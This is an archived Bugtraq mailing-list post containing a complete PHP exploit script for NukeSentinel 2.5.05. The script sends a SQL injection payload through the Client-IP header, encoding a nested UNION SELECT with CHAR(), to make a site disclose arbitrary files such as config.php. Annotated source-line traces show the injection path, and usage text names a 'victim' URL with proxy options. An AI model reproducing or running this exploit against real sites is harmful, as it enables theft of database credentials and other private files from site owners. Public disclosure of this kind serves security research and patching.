lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070220141148.25925.qmail@securityfocus.com>
Date: 20 Feb 2007 14:11:48 -0000
From: gmdarkfig@...il.com
To: bugtraq@...urityfocus.com
Subject: NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit

#!/usr/bin/php
<?php
/**
 * This file require the PhpSploit class.
 * If you want to use this class, the latest
 * version can be downloaded from acid-root.new.fr.
 **/
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);

# Module's Description:
# Advanced site security proudly produced by: NukeScripts Network, Raven PHPScripts, & NukeResources.
# ... IS IT A JOKE ?!
#
# SQL Injection --> File Disclosure
# Maybe work on other versions.
# Interesting exploit =)
#
if($argc < 5) {
print("
  NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit
------------------------------------------------------------------
PHP conditions: none
CMS conditions: disable_switch<=0 (module activated)
       Credits: DarkFig <gmdarkfig@...il.com>
           URL: http://www.acid-root.new.fr/
    Support us: Just click once on our publicity ;)
------------------------------------------------------------------
  Usage: $argv[0] -url <url> -file <file> [Options]
Example: $argv[0] -url http://www.victim.com/ -file config.php
Options: -proxy     If you wanna use a proxy <proxyhost:proxyport> 
         -proxyauth Basic authentification <proxyuser:proxypwd> 
------------------------------------------------------------------
"); exit(1);
}

$url   = getparam('url',1);  # http://localhost/php-nuke-7.9/html/
$file  = getparam('file',1); # config.php, admin/.htaccess
$proxy = getparam('proxy');
$authp = getparam('proxyauth');

$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);


# +nukesentinel.php
#
# 52. $nsnst_const['server_ip'] = get_server_ip();
# 53. $nsnst_const['client_ip'] = get_client_ip();
# 54. $nsnst_const['forward_ip'] = get_x_forwarded();
# 55. $nsnst_const['remote_addr'] = get_remote_addr();
# 56. $nsnst_const['remote_ip'] = get_ip(); // If $nsnst_const['client_ip'] return it, elseif $nsnst_const['forward_ip'] return it ... 
#
#
# $xpl->addheader("Client-IP","<something>255.255.255.255<something>");
# |
# 73. if(!ereg("([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})", $nsnst_const['client_ip'])) {$nsnst_const['client_ip'] = "none"; }
# 74. if(!ereg("([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})", $nsnst_const['forward_ip'])) {$nsnst_const['forward_ip'] = "none"; }
# 75. if(!ereg("([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})", $nsnst_const['remote_ip'])) {$nsnst_const['remote_ip'] = "none"; }
# 76. if(!ereg("([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})", $nsnst_const['remote_addr'])) {$nsnst_const['remote_addr'] = "none"; }
#
#
# 221. // Check if ip is blocked
# 222. $blocked_row = abget_blocked($nsnst_const['remote_ip']);
# 223. if($blocked_row) { blocked($blocked_row);}
#
#
# $xpl->addheader("Client-IP","' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.255.255.255");
# |
# 723. function abget_blocked($remoteip) {
# 724.  global $prefix, $db;
# 725.  $ip = explode(".", $remoteip);
# 726.  $testip1 = "$ip[0].*.*.*";                // ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.*.*.*
# 727.  $testip2 = "$ip[0].$ip[1].*.*";           // ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.255.*.*
# 728.  $testip3 = "$ip[0].$ip[1].$ip[2].*";      // ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.255.255.*
# 729.  $testip4 = "$ip[0].$ip[1].$ip[2].$ip[3]"; // ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.255.255.255
# 730.  $blocked_result = $db->sql_query("SELECT * FROM `".$prefix."_nsnst_blocked_ips` WHERE `ip_addr` = '$testip1' OR `ip_addr` = '$testip2' OR `ip_addr` = '$testip3' OR `ip_addr` = '$testip4'");
# 731.  $blocked_row = $db->sql_fetchrow($blocked_result);
# 732.  return $blocked_row;
# 733. }
#
#
# 1044. function blocked($blocked_row="", $blocker_row="") {
# 1050. if(empty($blocker_row)) { $blocker_row = abget_blockerrow($blocked_row['reason']); } // $blocked_row['reason'] ... 6,7,--->8<---,9
#
#
# $xpl->addheader("Client-IP","' UNION SELECT 1,2,3,4,5,6,7,".mysqlchar(' UNION SELECT -666,2,3,4,5,6,7,'../config.php',9,10,11 ORDER BY blocker #).",9,10,11,12,13,14,15,16,17,18#255.255.255.255");
# |
# 750. function abget_blockerrow($reason){
# 751.  global $prefix, $db;
# 752.  $blockerresult = $db->sql_query("SELECT * FROM `".$prefix."_nsnst_blockers` WHERE `blocker`='$reason'"); // + ' UNION SELECT -666,2,3,4,5,6,7,'../config.php',9,10,11 ORDER BY blocker #
# 753.  $blocker_row = $db->sql_fetchrow($blockerresult);
# 754.  return $blocker_row;
# 755. }
#
#
# 1044. function blocked($blocked_row="", $blocker_row="") {
# 1056.  $display_page = abget_template($blocker_row['template']); // $blocker_row['template'] ... 6,7,--->'../config.php'<---,9
#
#
# 1004. function abget_template($template="") {
# 1013.  $filename = "abuse/".$template; // $template = ../config.php
# 1014.  if(!file_exists($filename)) { $filename = "abuse/abuse_default.tpl"; }
# 1015.  $handle = @fopen($filename, "r");
# 1016.  $display_page = fread($handle, filesize($filename));
# 1017.  @fclose($handle);
# 1041.  return $display_page;
# 1042. }
#
# Interesting isn't it ? :]
#
$sql =  "' UNION SELECT 1,2,3,4,5,6,7,"
       .mysqlchar("' UNION SELECT -666,2,3,4,5,6,7,'../$file',9,10,11 ORDER BY blocker #")
       .",9,10,11,12,13,14,15,16,17,18#255.255.255.255";

$xpl->addheader("Client-IP",$sql);
$xpl->get($url.'index.php');
print $xpl->getcontent();

function mysqlchar($data)
{
	$char='CHAR(';
	for($i=0;$i<strlen($data);$i++)
	{
		$char .= ord($data[$i]);
                if($i != (strlen($data)-1)) $char .= ',';
	}
	return $char.')';
}

function getparam($param,$opt='')
{
	global $argv;
	foreach($argv as $value => $key)
	{
		if($key == '-'.$param) return $argv[$value+1];
	}
	if($opt) exit("\n#3 -$param parameter required");
	else return;
}

?>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ